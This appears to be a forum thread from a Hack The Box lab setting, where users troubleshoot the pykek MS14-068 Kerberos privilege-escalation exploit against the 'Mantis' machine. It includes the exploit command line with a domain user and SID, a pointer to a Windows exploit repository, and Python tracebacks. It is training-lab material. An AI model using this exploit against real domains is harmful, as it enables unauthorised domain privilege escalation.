MS14-068

Root@kali:~/Documents/mantis# python ms14-68.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d MANTIS
Traceback (most recent call last):
File "ms14-68.py", line 17, in
from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache

I am getting the above error.
Please help.

git clone GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits (collection of Windows privilege escalation vulnerabilities)

Grabbing the whole repo so you are not missing the pykek cache.

And then simply just go over to cd windows-kernel-exploits

And do another cd into MS14-068/pykek

Problem solved.

WARN

If you are about to use the pykek exploit be sure that it ain’t gonna work for the Active box, it’s patched.

This exploit still does not work.

[+] Building AS-REQ for mantis.htb.local… Done!
[+] Sending AS-REQ to mantis.htb.local… Done!
[+] Receiving AS-REP from mantis.htb.local… Done!
[+] Parsing AS-REP from mantis.htb.local…Traceback (most recent call last):
File "./ms14-068.py", line 189, in
sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
File "./ms14-068.py", line 48, in sploit
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
File "/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py", line 431, in decrypt_as_rep
return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
File "/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py", line 419, in _decrypt_rep
rep = decode(data, asn1Spec=spec)[0]
File "/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py", line 792, in call
stGetValueDecoder, self, substrateFun
File "/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py", line 55, in valueDecoder
value, _ = decodeFun(head, asn1Spec, tagSet, length)
File "/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py", line 798, in call
'%r not in asn1Spec: %r' % (tagSet, asn1Spec)
pyasn1.error.PyAsn1Error: TagSet(Tag(tagClass=0, tagFormat=32, tagId=16), Tag(tagClass=64, tagFormat=32, tagId=30)) not in asn1Spec: AsRep()